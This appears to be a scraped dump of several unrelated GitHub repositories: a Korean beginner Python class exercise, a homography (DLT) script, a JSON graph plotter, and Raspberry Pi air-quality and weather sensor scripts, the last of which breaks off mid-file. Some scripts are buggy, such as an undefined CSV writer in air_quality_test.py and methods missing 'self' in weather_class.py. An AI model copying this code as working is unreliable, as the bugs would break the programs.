9fac8bd883cca71b8df4ec46f9bdd2651d7069ca
|
refs/heads/master
| 2023-01-11T04:38:12.585878 | 2020-11-17T11:24:14 | 2020-11-17T11:24:14 | 293,013,964 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.567206859588623,
"alphanum_fraction": 0.5729265809059143,
"avg_line_length": 22.395349502563477,
"blob_id": "63e27067e4e8f70fddbc492429e414c72db762cb",
"content_id": "af10c5e14018ea8b62a687cb153235870a3319d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1163,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 43,
"path": "/test.py",
"repo_name": "NastyHub/classtest",
"src_encoding": "UTF-8",
"text": "\r\n#edit test\r\n#class 테스트\r\n\r\nclass character():\r\n \r\n #init은 class가 생성될때마다 등장합니다\r\n def __init__(self, name = \"No\", health = 100, money = 100):\r\n self.name = name\r\n self.money = money\r\n self.health = health\r\n print(f\"{self.name} spawned with ${self.money}\")\r\n\r\n def checkmoney(self):\r\n return self.money\r\n\r\n def checkhealth(self):\r\n return self.health\r\n\r\n def __del__(self):\r\n print(f\"{self.name}이 사망하였습니다\")\r\n\r\nprint(\"Character Spawn Module\")\r\n\r\nnameofplr = input(\"스폰하고싶은 캐릭터 이름?: \")\r\n\r\nplayer = character(nameofplr)\r\n\r\nwhile True:\r\n question = input(\"하고싶은활동\\n모르겠으면 'help'을 입력해주세요\\n:\")\r\n\r\n if question.lower() == \"help\":\r\n print(\"checkmoney, checkhealth, suicide\")\r\n continue\r\n elif question.lower() == \"checkmoney\":\r\n print(player.checkmoney())\r\n continue\r\n elif question.lower() == \"checkhealth\":\r\n print(player.checkhealth())\r\n continue\r\n elif question.lower() == \"suicide\":\r\n del player\r\n break\r\nprint(\"게임 오버\")"
},
{
"alpha_fraction": 0.7846153974533081,
"alphanum_fraction": 0.7846153974533081,
"avg_line_length": 31.5,
"blob_id": "265f996f34ebd41919e457e51002acd01e8c3822",
"content_id": "a8f0cf83e19d57e646948ed875daef7845a00e1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 4,
"path": "/README.md",
"repo_name": "NastyHub/classtest",
"src_encoding": "UTF-8",
"text": "# classtest\n클래스 테스트\n\nI'm currently working with Discord.py and decided to write these down for the sake of my python experience..\n"
}
] | 2 |
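The command loop in test.py above grows by one elif branch per command; a common refactor is a dispatch dict mapping command names to bound methods. A rough sketch reusing the character class from that file (English prompts substituted, command names mirror the original help text):

player = character("Hero")
commands = {"checkmoney": player.checkmoney, "checkhealth": player.checkhealth}

while True:
    question = input("Action ('help' for a list): ").lower()
    if question == "help":
        print(", ".join(commands) + ", suicide")
    elif question in commands:
        print(commands[question]())  # call the bound method looked up by name
    elif question == "suicide":
        del player
        break
print("Game over")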
scarlettliu644/DLT
|
https://github.com/scarlettliu644/DLT
|
59adf19906b282bcf6d0c2f8a9323c2c2068daf7
|
2c0b634b171a53152fc1be93fb50833020510e8a
|
8c01c21f935ee99a5eb4e0bd88847f29e01b5ed4
|
refs/heads/master
| 2022-04-22T18:42:37.206255 | 2020-04-26T19:10:56 | 2020-04-26T19:10:56 | 438,851,512 | 1 | 0 | null | 2021-12-16T03:45:51 | 2021-09-16T09:25:27 | 2020-04-26T19:11:14 | null |
[
{
"alpha_fraction": 0.7610062956809998,
"alphanum_fraction": 0.7735849022865295,
"avg_line_length": 25.5,
"blob_id": "e5ae57316f63e61639258db49518b212f921e80e",
"content_id": "7ac19b600256c4f9224a8b3aeee0eff17cfd10ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 12,
"path": "/README.md",
"repo_name": "scarlettliu644/DLT",
"src_encoding": "UTF-8",
"text": "# DLT\nA simple python implementation of the normalized DLT algorithm: It follows the steps in algorothm 4.2 from Zisserman Multiple View Geometry (2nd edition)\n\n## Run\n\n```\npython3 DLT.py\n```\n\n## Data\n\nThe boat folder contains two images (original and warped) together with their corresponding homography data points.\n"
},
{
"alpha_fraction": 0.5898836255073547,
"alphanum_fraction": 0.6103063225746155,
"avg_line_length": 27.26174545288086,
"blob_id": "5ed4a3bebfee4b6105d7266e1528452759897d34",
"content_id": "7232a4317db992d8f943de8612c4501de3a9b2ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4211,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 149,
"path": "/DLT.py",
"repo_name": "scarlettliu644/DLT",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef split_at_char(s, first, last ):\n try:\n start = s.rindex( first ) + len( first )\n end = s.rindex( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef get_average_dist_to_origin(points):\n dist = (points - [0,0])**2\n dist = np.sum(dist, axis=1)\n dist = np.sqrt(dist)\n\n return np.mean(dist)\n\ndef read_data(folder, file):\n \"\"\"\n Returns a list of lists containing the points of the\n reference and warped images.\n \"\"\"\n\n print(\"Reading original and warped image datapoints...\")\n\n with open(os.path.join(\"boat\", \"homography.txt\"), \"r\") as file:\n image_data = [line for line in file]\n\n image1 = image_data[0]\n image1 = split_at_char(image1, \"[\", \"]\").split(\";\")\n image1 = [elem.split(\",\") for elem in image1]\n image1 = [list(map(int,i)) for i in image1]\n\n image2 = image_data[1]\n image2 = split_at_char(image2, \"[\", \"]\").split(\";\")\n image2 = [elem.split(\",\") for elem in image2]\n image2 = [list(map(int,i)) for i in image2]\n\n return image1, image2\n\ndef normalize_image_points(image):\n \"\"\"\n Input: 2D list with x,y image points\n Output:\n \"\"\"\n\n print()\n print(\"Normalizing data using similarity matrix...\")\n\n image = np.array(image)\n mean, std = np.mean(image, 0), np.std(image)\n\n # define similarity transformation\n # no rotation, scaling using sdv and setting centroid as origin\n Transformation = np.array([[std/np.sqrt(2), 0, mean[0]],\n [0, std/np.sqrt(2), mean[1]],\n [0, 0, 1]])\n\n # apply transformation on data points\n Transformation = np.linalg.inv(Transformation)\n image = np.dot(Transformation, np.concatenate((image.T, np.ones((1, image.shape[0])))))\n\n # retrieve normalized image in the original input shape (25, 2)\n image = image[0:2].T\n\n print(\"translated origin:\", np.mean(image, axis=0))\n print(\"average distance to origin:\", get_average_dist_to_origin(image))\n\n return image, Transformation\n\ndef compute_matrix_A(points1, points2, no_points):\n \"\"\"\n Input: Normalized correspondences for image1 and image2\n Output: Matrix A as defined in Zisserman p. 91\n \"\"\"\n\n A = []\n\n for i in range(0, no_points):\n x, y = points1[i, 0], points1[i, 1]\n x_prime, y_prime = points2[i, 0], points2[i, 1]\n\n # create A_i according to the eq. 
in the book\n # here we are assuming w_i is one\n A.append([0, 0, 0, -x, -y, -1, y_prime*x, y_prime*y, y_prime])\n A.append([x, y, 1, 0, 0, 0, -x_prime*x, -x_prime*y, -x_prime])\n\n print()\n print(\"Stacked matrix A shape:\", np.shape(A))\n\n return np.asarray(A)\n\ndef compute_SVD(matrix_A):\n print()\n print(\"Computing SVD...\")\n\n return np.linalg.svd(matrix_A)\n\ndef get_vector_h(matrix_V):\n \"\"\"\n Input: Matrix V from SVD of A\n Output: Unitary vector h (last column of V matrix of SVD)\n \"\"\"\n print()\n print(\"Obtaining vector h...\")\n\n h = matrix_V[-1,:] / matrix_V[-1,-1]\n\n return h\n\ndef main():\n # read image data points\n image1, image2 = read_data(\"boat\", \"homography.txt\")\n\n # set data points to numpy arrays\n image1 = np.array(image1)\n image2 = np.array(image2)\n no_points = image1.shape[0]\n\n # normalize data\n image1_normalized, T = normalize_image_points(image1)\n image2_normalized, T_prime = normalize_image_points(image2)\n\n # get matrix A for each normalized correspondence (dims 2*n x 9)\n A = compute_matrix_A(image1_normalized, image2_normalized, no_points)\n\n # compute SVD of A\n U, S, V = compute_SVD(A)\n\n # get last column of V and normalize it (this is the vector h)\n h = get_vector_h(V)\n\n # obtain homography (H tilde)\n print()\n print(\"Reshaping to get homography H_tilde...\")\n H_tilde = h.reshape(3,3)\n\n # denormalize to obtain homography (H) using the transformations and generalized pseudo-inverse\n H = np.dot(np.dot(np.linalg.pinv(T_prime), H_tilde), T)\n\n print()\n print(\"Denormalized to obtain homography H for 2D data points...\")\n print(\"Matrix H:\")\n print(H)\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
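A natural sanity check on the homography H printed by main() in DLT.py above, sketched with the same numpy conventions: map the first image's points through H and measure the mean reprojection error against the second image's points (reprojection_error is a name introduced here):

import numpy as np

def reprojection_error(H, points1, points2):
    pts1 = np.asarray(points1, dtype=float)
    pts2 = np.asarray(points2, dtype=float)
    ones = np.ones((pts1.shape[0], 1))
    projected = (H @ np.hstack([pts1, ones]).T).T     # homogeneous transfer x' = H x
    projected = projected[:, :2] / projected[:, 2:3]  # back to inhomogeneous coordinates
    return np.mean(np.linalg.norm(projected - pts2, axis=1))  # mean point-to-point error

A small value indicates the estimated H maps the original points close to their warped correspondences.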
razcohen5/XYGraphCreation
|
https://github.com/razcohen5/XYGraphCreation
|
2ce5136e0467ee3ddd9fefe5c990d7bd3000e942
|
b110881ccbdbc8c8926338f3f281bcd6376b535b
|
6cf0f1772b54e22abd6ed91916a002eb87994569
|
refs/heads/master
| 2022-11-27T01:36:20.583712 | 2020-03-18T15:53:31 | 2020-03-18T15:53:31 | 248,274,564 | 0 | 0 | null | 2020-03-18T15:46:18 | 2020-03-18T15:53:35 | 2022-11-15T23:22:00 |
Java
|
[
{
"alpha_fraction": 0.7232876420021057,
"alphanum_fraction": 0.7232876420021057,
"avg_line_length": 26.076923370361328,
"blob_id": "7abe74a18849fe21c9ae186305bd65fbaf377955",
"content_id": "6ffab87eb2b35132e7f0a421568b7b9bce8527ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 13,
"path": "/XYGraphCreation/src/main/java/json/JsonIO.java",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "package json;\r\n\r\nimport com.fasterxml.jackson.databind.ObjectMapper;\r\n\r\nimport java.io.File;\r\nimport java.io.IOException;\r\n\r\npublic class JsonIO {\r\n public static void writeToJsonFile(Object object, String jsonFilePath) throws IOException {\r\n ObjectMapper mapper = new ObjectMapper();\r\n mapper.writeValue(new File(jsonFilePath),object);\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.5962145328521729,
"alphanum_fraction": 0.5962145328521729,
"avg_line_length": 21.923076629638672,
"blob_id": "9f4855265161f76b0e38e151b75a94a218e2b855",
"content_id": "0c7c6d941b029773f38e18325cb0bbc5d52234d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 317,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 13,
"path": "/XYGraphCreation/src/main/python/GraphDrawer.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nclass GraphDrawer:\r\n \r\n @staticmethod\r\n def drawContinuous(graph):\r\n plt.plot(graph.xValues, graph.yValues)\r\n plt.show()\r\n \r\n @staticmethod\r\n def drawScattered(graph):\r\n plt.scatter(graph.xValues, graph.yValues)\r\n plt.show()\r\n\r\n"
},
{
"alpha_fraction": 0.7795823812484741,
"alphanum_fraction": 0.7795823812484741,
"avg_line_length": 33.75,
"blob_id": "00412ab5e860790064f33c674d6f8442a1d944b9",
"content_id": "2999876dc178f6384b3afa04b58d9fbdd981bcf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 12,
"path": "/XYGraphCreation/src/main/python/MainExample.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom JsonIO import JsonIO\r\nfrom GraphJsonConverter import GraphJsonConverter\r\nfrom GraphDrawer import GraphDrawer\r\n\r\ndef MainExample():\r\n jsonFilePath = \"C:\\intellij\\projects\\XYGraphCreation\\examplejsonfiles\\json.txt\"\r\n graphAsJson = JsonIO.read(jsonFilePath)\r\n graph = GraphJsonConverter.convertJsonToGraph(graphAsJson)\r\n GraphDrawer.drawScattered(graph)\r\n GraphDrawer.drawContinuous(graph)\r\n \r\nMainExample()"
},
{
"alpha_fraction": 0.5978022217750549,
"alphanum_fraction": 0.5978022217750549,
"avg_line_length": 28.200000762939453,
"blob_id": "2ef71cd3c9e3cab98cd4b48d645366009d9e82d5",
"content_id": "76bbc8ab98d72aee2957296941c776c6695e0cd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 455,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/XYGraphCreation/src/main/python/GraphJsonConverter.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nfrom Graph import Graph\r\n\r\nclass GraphJsonConverter:\r\n GRAPH_POINTS_NAME = 'points'\r\n X_VALUE_NAME = 'x'\r\n Y_VALUE_NAME = 'y'\r\n \r\n @classmethod\r\n def convertJsonToGraph(cls,graphAsJson):\r\n xValues = []\r\n yValues = []\r\n for point in graphAsJson[cls.GRAPH_POINTS_NAME]:\r\n xValues.append(point[cls.X_VALUE_NAME])\r\n yValues.append(point[cls.Y_VALUE_NAME])\r\n return Graph(xValues,yValues)"
},
{
"alpha_fraction": 0.5819672346115112,
"alphanum_fraction": 0.5819672346115112,
"avg_line_length": 28,
"blob_id": "c6e17725c1ec08b594b8531c80e45f4581dc766d",
"content_id": "9468adebad0c3492807d1c2f6653d6f2de7b9b68",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 4,
"path": "/XYGraphCreation/src/main/python/Graph.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nclass Graph:\r\n def __init__(self, xValues,yValues):\r\n self.xValues = xValues\r\n self.yValues = yValues"
},
{
"alpha_fraction": 0.604651153087616,
"alphanum_fraction": 0.604651153087616,
"avg_line_length": 19.25,
"blob_id": "52ea0c75ef12d44cdfbb9d4043e84563a2b11dc4",
"content_id": "b4cfbe2f8418b2b95f12855bfeeb16c9581faa94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 8,
"path": "/XYGraphCreation/src/main/python/JsonIO.py",
"repo_name": "razcohen5/XYGraphCreation",
"src_encoding": "UTF-8",
"text": "\r\n\r\nimport json\r\n\r\nclass JsonIO:\r\n \r\n @staticmethod\r\n def read(jsonFilePath):\r\n with open(jsonFilePath) as jsonFile:\r\n return json.load(jsonFile)"
}
] | 6 |
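For reference, the JSON shape that GraphJsonConverter.py above expects can be produced from Python in a few lines; the output filename is illustrative, and the keys mirror GRAPH_POINTS_NAME, X_VALUE_NAME and Y_VALUE_NAME:

import json

graph = {"points": [{"x": x, "y": x * x} for x in range(10)]}  # sample parabola
with open("json.txt", "w") as f:
    json.dump(graph, f)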
ziruijiang/dosenet-raspberrypi
|
https://github.com/ziruijiang/dosenet-raspberrypi
|
a775cbd6564eff7e772ad4a104f7d0ab78d3d1d0
|
2bb4945a4878084199b9e96f2661cfb02f21ab9d
|
ac589579959ff5aeccc9f1413584ac94bcafceaa
|
refs/heads/master
| 2021-01-24T09:32:21.935408 | 2018-04-11T17:04:56 | 2018-04-11T17:04:56 | 123,018,745 | 0 | 1 |
MIT
| 2018-02-26T19:21:55 | 2018-02-26T19:21:57 | 2018-04-11T18:26:59 |
Python
|
[
{
"alpha_fraction": 0.5185551643371582,
"alphanum_fraction": 0.5643246173858643,
"avg_line_length": 32.40495681762695,
"blob_id": "44485dec559355bfd86bca1060c52b7435d3ae86",
"content_id": "8db59fdf7be0d512ae1ed0e31818814e30b6cb29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4042,
"license_type": "permissive",
"max_line_length": 275,
"num_lines": 121,
"path": "/air_quality_test.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "import serial\nimport binascii\nimport csv\nimport datetime\nimport time\nimport argparse\nimport sys\n\n#Initiate timer\nparser = argparse.ArgumentParser()\nparser.add_argument(\"runtime\", type = int, help = \"Enter a whole number. This will determine the length of time in seconds for which the test will run.\")\ninfo = parser.parse_args()\nrun_time = info.runtime\ncounter_time= int(time.time())\n\nsys.stdout.flush()\n\n# Open CSV file to save results\nsys.stdout.flush()\n#Open CSV file to log results\nlogfilename = \"air_quality_test_results.csv\"\nlog_results = open(logfilename, \"wb+\", 0)\n\n#Open CSV file to log results\nlogfilename = \"air_quality_test_results.csv\"\nlog_results = open(logfilename, \"wb+\", 0)\n\n# Add metadata to CSV file\nmetadata = []\nmetadata.append(\"Date and Time\")\nmetadata.append(\"0.3 um\")\nmetadata.append(\"0.5 um\")\nmetadata.append(\"1.0 um\")\nmetadata.append(\"2.5 um\")\nmetadata.append(\"5.0 um\")\nmetadata.append(\"10 um\")\nmetadata.append(\"PM 1.0\")\nmetadata.append(\"PM 2.5\")\nmetadata.append(\"PM 10\")\nlog_results.write(metadata[0]+\",\"+metadata[1]+\",\"+metadata[2]+\",\"+metadata[3]+\",\"+metadata[4]+\",\"+metadata[5]+\",\"+metadata[6]+\",\"+metadata[7]+\",\"+metadata[8]+\",\"+metadata[9]+\"\\n\")\n\nprint(\"Results: \")\n\nport = serial.Serial(\"/dev/ttyS0\", baudrate=9600, timeout=1.5)\nwhile True:\n try:\n text = port.read(32)\n except:\n print('Error: Exiting')\n exit()\n\n buffer = [ord(c) for c in text]\n if buffer[0] == 66:\n #Check sum with last byte of list\n sumation = sum(buffer[0:30])\n checkbyte = (buffer[30]<<8)+buffer[31]\n if sumation == ((buffer[30]<<8)+buffer[31]):\n buf = buffer[1:32]\n\n # Get concentrations ug/m3\n PM01Val=((buf[3]<<8) + buf[4])\n PM25Val=((buf[5]<<8) + buf[6])\n PM10Val=((buf[7]<<8) + buf[8])\n\n # Get number of particles in 0.1 L of air above specific diameters\n\n P3 =((buf[15]<<8) + buf[16])\n P5 =((buf[17]<<8) + buf[18])\n P10 =((buf[19]<<8) + buf[20])\n P25 =((buf[21]<<8) + buf[22])\n P50 =((buf[23]<<8) + buf[24])\n P100=((buf[25]<<8) + buf[26])\n\n date_time = datetime.datetime.now()\n\n # Print Log File Information\n print(\"Date/Time: \"+datetime.datetime.strftime(date_time, \"%Y-%m-%d %H:%M:%S\")+\"\\n\")\n print(\"P3: \"+repr(P3))\n print(\"P5: \"+repr(P5))\n print(\"P10: \"+repr(P10))\n print(\"P25: \"+repr(P25))\n print(\"P50: \"+repr(P50))\n print(\"P100: \"+repr(P100)+\"\\n\")\n print(\"PM01: \"+repr(PM01Val))\n print(\"PM25: \"+repr(PM25Val))\n print(\"PM10: \"+repr(PM10Val)+\"\\n\")\n\n # Put results in a CSV file\n results = []\n results.append(date_time)\n results.append(repr(P3))\n results.append(repr(P5))\n results.append(repr(P10))\n results.append(repr(P25))\n results.append(repr(P50))\n results.append(repr(P100))\n results.append(repr(PM01Val))\n results.append(repr(PM25Val))\n results.append(repr(PM10Val))\n pen_results.writerow(results[0:10])\n log_results.write(datetime.datetime.strftime(results[0], \"%Y-%m-%d %H:%M:%S\")+\",\"+str(results[1])+\",\"+str(results[2])+\",\"+str(results[3])+\",\"+str(results[4])+\",\"+str(results[5])+\",\"+str(results[6])+\",\"+str(results[7])+\",\"+str(results[8])+\",\"+str(results[9])+\"\\n\")\n\n else:\n print('Check Sum Failed')\n\n # Put results in a CSV file\n results = []\n date_time = datetime.datetime.now()\n results.append(date_time)\n results.append('Check Sum Failed')\n pen_results.writerow(results[0:2])\n\n else:\n print('Data Acquisition Failed')\n\n # Put results in a CSV file\n results = []\n date_time = 
datetime.datetime.now()\n        results.append(date_time)\n        results.append('Data Acquisition Failed')\n        pen_results.writerow(results[0:2])\n"
},
{
"alpha_fraction": 0.5455202460289001,
"alphanum_fraction": 0.5823699235916138,
"avg_line_length": 28.46808433532715,
"blob_id": "630fbad6685614263a2d1d01510c5fc5d8660ea4",
"content_id": "0b4f91911c33e9e36d3952a75ab285422ed3dbfc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 47,
"path": "/weather_class.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 12 11:32:41 2017\n\n@author: Ludi Cao\n\"\"\"\nimport time\nimport datetime\nimport csv\nfrom Adafruit_BME280 import *\n\nclass weather_DAQ(object):\n def __init__(self):\n self.sensor = BME280(t_mode=BME280_OSAMPLE_8, p_mode=BME280_OSAMPLE_8, h_mode=BME280_OSAMPLE_8)\n self.running=False\n \n def open_file():\n file_time= time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime())\n filename = \"weather_test_results_\"+file_time+\".csv\"\n results=csv.writer(open(filename, \"ab+\"), delimiter = \",\")\n metadata=[\"Time\", \"Temp (C)\",\"Pressure (hPa)\", \"Humidity (%)\"]\n results.writerow(metadata)\n\n def start():\n global job1\n date_time = datetime.datetime.now()\n degrees = sensor.read_temperature()\n pascals = sensor.read_pressure()\n hectopascals = pascals / 100\n humidity = sensor.read_humidity()\n\n print ('Temp = {0:0.3f} deg C'.format(degrees))\n print ('Pressure = {0:0.2f} hPa'.format(hectopascals))\n print ('Humidity = {0:0.2f} %'.format(humidity))\n \n data=[]\n data.append(date_time)\n data.append(degrees)\n data.append(hectopascals)\n data.append(humidity)\n \n results.writerow(data)\n job1=top.after(1000,start)\n \n def stop():\n global job1\n top.after_cancel(job1)"
},
{
"alpha_fraction": 0.6087295413017273,
"alphanum_fraction": 0.6188620328903198,
"avg_line_length": 24.65999984741211,
"blob_id": "a99ef32cba0c252170be48f4e2dfdde04cddb852",
"content_id": "63a649c0d67193f113e784a9807c5affd436a3f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1283,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 50,
"path": "/SensorTest.sh",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\ndose_net_dir=/home/pi/dosenet-raspberrypi\n\nfor i in $@\ndo\n case $i in\n AQ)\n echo \"Starting Air Quality Sensor\"\n sudo python $dose_net_dir/air_quality_test.py &\n ;;\n\n ADC)\n echo \"Starting CO2 Sensor and UV Sensor\"\n sudo python $dose_net_dir/adc_test.py &\n ;;\n\n AT)\n echo \"Starting Atmosphere Sensor\"\n sudo python $dose_net_dir/weather_test.py &\n ;;\n\n Si)\n echo \"Starting Silicon Radiation Detector\" > /tmp/pocket_manager.log\n sudo python $dose_net_dir/manager.py --logfile /tmp/pocket_manager.log >>/tmp/pocket_manager.log 2>&1\n ;;\n\n CsI)\n echo \"Starting Cesium Iodide Radiation Detector\" > /tmp/d3s_manager.log\n sudo python $dose_net_dir/manager_D3S.py --logfile /tmp/d3s_manager.log >> /tmp/d3s_manager.log 2>&1\n ;;\n\n stop)\n echo \"Stopping Sensor Programs.\"\n sudo pkill -SIGTERM -f manager.py\n sudo pkill -SIGTERM -f air_quality_test.py\n sudo pkill -SIGTERM -f manager_D3S.py\n sudo pkill -SIGTERM -f weather_test.py\n sudo pkill -SIGTERM -f adc_test.py\n exit 0\n ;;\n\n *)\n echo \"Error: Incorrect Usage\"\n echo \"Usage: /home/pi/dosenet-raspberrypi/SensorTest.sh {AQ|AT|ADC|Si|CsI|Stop}\"\n exit 1\n ;;\n\n esac\ndone\nexit 0\n"
},
{
"alpha_fraction": 0.5240980982780457,
"alphanum_fraction": 0.5370631217956543,
"avg_line_length": 35.57732009887695,
"blob_id": "80dd715de093c616a2d47a57e577bed24886978f",
"content_id": "23781269475a64de084ac12f2655aebd34efc070",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7096,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 194,
"path": "/data_handler_aq.py",
"repo_name": "ziruijiang/dosenet-raspberrypi",
"src_encoding": "UTF-8",
"text": "from auxiliaries import datetime_from_epoch\nfrom auxiliaries import set_verbosity\nfrom globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED\nfrom globalvalues import ANSI_BLUE, ANSI_CYAN\nfrom globalvalues import DEFAULT_DATA_BACKLOG_FILE_AQ\nfrom globalvalues import AQ_PM_DISPLAY_TEXT, AQ_P_DISPLAY_TEXT\nfrom globalvalues import BREAK_LINE, TIME_DISPLAY_TEXT, strf\nfrom collections import deque\nimport socket\nimport time\nimport ast\nimport os\nimport errno\nimport csv\n\nclass Data_Handler_AQ(object):\n \"\"\"\n Object for sending the data from the Air Quality\n sensor to the server.\n\n Also handles writing data to datalog and storing\n data to the memory\n \"\"\"\n\n def __init__(self,\n manager=None,\n verbosity=1,\n logfile=None,\n variables=None,\n ):\n\n self.v = verbosity\n if manager and logfile is None:\n set_verbosity(self, logfile=manager.logfile)\n else:\n set_verbosity(self, logfile=logfile)\n\n self.manager = manager\n self.queue = deque('')\n\n self.variables = variables\n\n \"\"\"\n The average_data list has elements comprised of:\n\n PM01 = Concentration of Particulate Matter less than 1.0um in ug/m3\n PM25 = Concentration of Particulate Matter less than 2.5um in ug/m3\n PM10 = Concentration of Particulate Matter less than 10um in ug/m3\n\n P03 = Number of paricles in 0.1 L of air over a diameter of 0.3um\n P05 = Number of paricles in 0.1 L of air over a diameter of 0.5um\n P10 = Number of paricles in 0.1 L of air over a diameter of 1.0um\n P25 = Number of paricles in 0.1 L of air over a diameter of 2.5um\n P50 = Number of paricles in 0.1 L of air over a diameter of 5.0um\n P100 = Number of paricles in 0.1 L of air over a diameter of 10um\n \"\"\"\n\n def test_send(self, average_data):\n \"\"\"\n Test Mode\n \"\"\"\n self.vprint(\n 1, ANSI_RED + \" * Test mode, not sending to server * \" +\n ANSI_RESET)\n\n def no_config_send(self, average_data):\n \"\"\"\n Configuration file not present\n \"\"\"\n self.vprint(1, \"Missing config file, not sending to server\")\n\n def no_publickey_send(self, average_data):\n \"\"\"\n Publickey not present\n \"\"\"\n self.vprint(1, \"Missing public key, not sending to server\")\n\n def send_to_memory(self, average_data):\n \"\"\"\n Network is not up\n \"\"\"\n self.send_to_queue(average_data)\n self.vprint(1, \"Network down, saving to queue in memory\")\n\n def regular_send(self, this_end, average_data):\n \"\"\"\n Normal send\n \"\"\"\n self.manager.sender.send_data_new_AQ(this_end, average_data)\n if self.queue:\n self.vprint(1, \"Flushing memory queue to server\")\n while self.queue:\n #print(len(self.queue))\n trash = self.queue.popleft()\n self.manager.sender.send_data_new_AQ(\n trash[0], trash[1])\n\n def send_all_to_backlog(self, path=DEFAULT_DATA_BACKLOG_FILE_AQ):\n if self.queue:\n self.vprint(1, \"Flushing memory queue to backlog file\")\n with open(path, 'a') as f:\n while self.queue:\n f.write('{0}, '.format(self.queue.popleft()))\n\n def send_to_queue(self, average_data):\n \"\"\"\n Adds the time and average_data to the queue object.\n \"\"\"\n time_string = time.time()\n self.queue.append([time_string, average_data])\n\n def backlog_to_queue(self, path=DEFAULT_DATA_BACKLOG_FILE_AQ):\n \"\"\"\n Sends data in backlog to queue and deletes the backlog\n \"\"\"\n if os.path.isfile(path):\n self.vprint(2, \"Flushing backlog file to memory queue\")\n with open(path, 'r') as f:\n data = f.read()\n data = ast.literal_eval(data)\n for i in data:\n self.queue.append([i[0], i[1]])\n print(self.queue)\n 
os.remove(path)\n\n def main(self, datalog, average_data, this_start, this_end):\n \"\"\"\n Determines how to handle the average air quality data\n \"\"\"\n start_text = datetime_from_epoch(this_start).strftime(strf)\n end_text = datetime_from_epoch(this_end).strftime(strf)\n\n self.vprint(\n 1, TIME_DISPLAY_TEXT.format(\n start_time=start_text,\n end_time=end_text))\n for i in range(3):\n \tself.vprint(\n 1, AQ_PM_DISPLAY_TEXT.format(\n variable=self.variables[i],\n avg_data=average_data[i]))\n for i in range(3, 9):\n \tself.vprint(\n 1, AQ_P_DISPLAY_TEXT.format(\n variable=self.variables[i],\n avg_data=average_data[i]))\n self.vprint(\n 1, BREAK_LINE)\n\n self.manager.data_log(datalog, average_data=average_data)\n\n if self.manager.test:\n self.send_to_memory(average_data)\n elif not self.manager.config:\n self.no_config_send(average_data)\n elif not self.manager.publickey:\n self.no_publickey_send(average_data)\n else:\n try:\n self.regular_send(this_end, average_data)\n except (socket.gaierror, socket.error, socket.timeout) as e:\n if e == socket.gaierror:\n if e[0] == socket.EAI_AGAIN:\n # TCP and UDP\n # network is down, but NetworkStatus didn't notice yet\n # (resolving DNS like dosenet.dhcp.lbl.gov)\n self.vprint(\n 1,\n 'Failed to send packet! Address resolution error')\n else:\n self.vprint(\n 1, 'Failed to send packet! Address error: ' +\n '{}: {}'.format(*e))\n elif e == socket.error:\n if e[0] == errno.ECONNREFUSED:\n # TCP\n # server is not accepting connections\n self.vprint(\n 1, 'Failed to send packet! Connection refused')\n elif e[0] == errno.ENETUNREACH:\n # TCP and UDP\n # network is down, but NetworkStatus didn't notice yet\n # (IP like 131.243.51.241)\n self.vprint(\n 1, 'Failed to send packet! Network is 